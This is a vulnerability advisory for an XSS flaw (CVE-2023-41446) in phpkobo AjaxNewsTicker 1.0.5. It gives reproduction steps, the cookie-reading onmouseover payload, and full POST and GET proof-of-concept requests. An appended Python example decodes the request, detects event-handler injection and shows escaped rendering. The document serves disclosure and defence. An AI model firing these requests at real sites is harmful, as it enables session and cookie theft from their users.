CVE-2023-41446
Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: Cross Site Scripting vulnerability in phpkobo AjaxNewsTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted script inside the "title" parameter for "creating news" in the index.php component.
Attack Vectors: To exploit this vulnerability the victim must click the malicious link; the payload then executes in the victim's browser.
Attack Type: Remote
Payload: onmouseover=alert(document.cookie)
Assigned CVE-ID: CVE-2023-41446
Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)
Steps To Reproduce
1. Browse to the following URL: https://<target.xyz>/ntic/admin/index.php?_rtp=nticker&_be=1
2. Click "tickers" in the left panel
3. Click "add new"
4. Insert the payload in the "title" field of the newly added news item
5. The attacker crafts the malicious link and sends it to the victim; opening it executes the payload in the victim's browser.
#PoC [POST method]
POST /ntic/admin/index.php?_rtp=nticker&_be=1 HTTP/1.1
Host: localhost:<port no.>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json,text/javascript,*/*;q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

requ=%7b%22cmd%22%3a%22reg_done%22%2c%22form%22%3a%7b%22title%22%3a%22testx5dop%20onmouseover%3dalert(document.cookie)%20plsgs%22%7d%2c%22dts%22%3a%7b%22page_idx%22%3a1%2c%22page_size%22%3a10%2c%22total_rec%22%3a%222346%22%2c%22total_page%22%3a235%2c%22rec_idx_s%22%3a1%2c%22rec_idx_e%22%3a10%2c%22sort_val%22%3a%22dt_create%3adesc%22%7d%2c%22criteria%22%3a%7b%22keyword%22%3a%22%22%7d%7d
#PoC [GET method]
GET /ntic/admin/index.php?_rtp=nticker&_be=11&requ=%7b%22cmd%22%3a%22reg_done%22%2c%22form%22%3a%7b%22title%22%3a%22testx5dop%20onmouseover%3dalert(document.cookie)%20plsgs%22%7d%2c%22dts%22%3a%7b%22page_idx%22%3a1%2c%22page_size%22%3a10%2c%22total_rec%22%3a%222346%22%2c%22total_page%22%3a235%2c%22rec_idx_s%22%3a1%2c%22rec_idx_e%22%3a10%2c%22sort_val%22%3a%22dt_create%3adesc%22%7d%2c%22criteria%22%3a%7b%22keyword%22%3a%22%22%7d%7d HTTP/1.1
Host: localhost:<port no.>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json,text/javascript,*/*;q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
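As an added, defender-side example (not code from this advisory or from AjaxNewsTicker), the Python below decodes the `requ` query parameter carried by the PoC request, pulls out `form.title`, flags the inline event-handler pattern for log or WAF review, and contrasts a hypothetical unquoted-attribute rendering with a quoted, HTML-encoded one. The request line is constructed from the PoC's structure, and both render functions are a reconstruction of the bug class, not the product's own code.

```python
"""Defender-side handling of the AjaxNewsTicker `requ` parameter (added example).

Assumptions (not taken from the advisory): the decoded `requ` JSON has the shape
shown in the PoC ({"cmd": ..., "form": {"title": ...}, ...}); the two render_*
functions are a hypothetical reconstruction of the bug class, not product code.
"""
import html
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request line using the PoC's `requ` layout and payload (shortened).
POC_REQUEST_LINE = (
    "GET /ntic/admin/index.php?_rtp=nticker&_be=11&requ="
    "%7b%22cmd%22%3a%22reg_done%22%2c%22form%22%3a%7b%22title%22%3a"
    "%22testx5dop%20onmouseover%3dalert(document.cookie)%20plsgs%22%7d%7d HTTP/1.1"
)

# Matches an inline event-handler attribute such as onmouseover= or onerror=.
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def extract_requ(request_line: str) -> dict:
    """Decode the JSON object carried in the `requ` query parameter."""
    target = request_line.split(" ")[1]          # request-target of the request line
    params = parse_qs(urlsplit(target).query)    # percent-decodes each value
    return json.loads(params["requ"][0])


def title_from_requ(requ: dict) -> str:
    """Return the news title submitted through form.title (empty if absent)."""
    return requ.get("form", {}).get("title", "")


def looks_like_attribute_injection(title: str) -> bool:
    """Detection rule for access logs or a WAF: handler attribute or tag opener."""
    return bool(EVENT_HANDLER.search(title)) or "<" in title


def render_title_vulnerable(title: str) -> str:
    """Hypothetical unquoted, unescaped attribute: the payload becomes a handler."""
    return f"<div title={title}>news</div>"


def render_title_hardened(title: str) -> str:
    """Quote the attribute AND HTML-encode the value, so the title stays inert text."""
    return f'<div title="{html.escape(title, quote=True)}">news</div>'
```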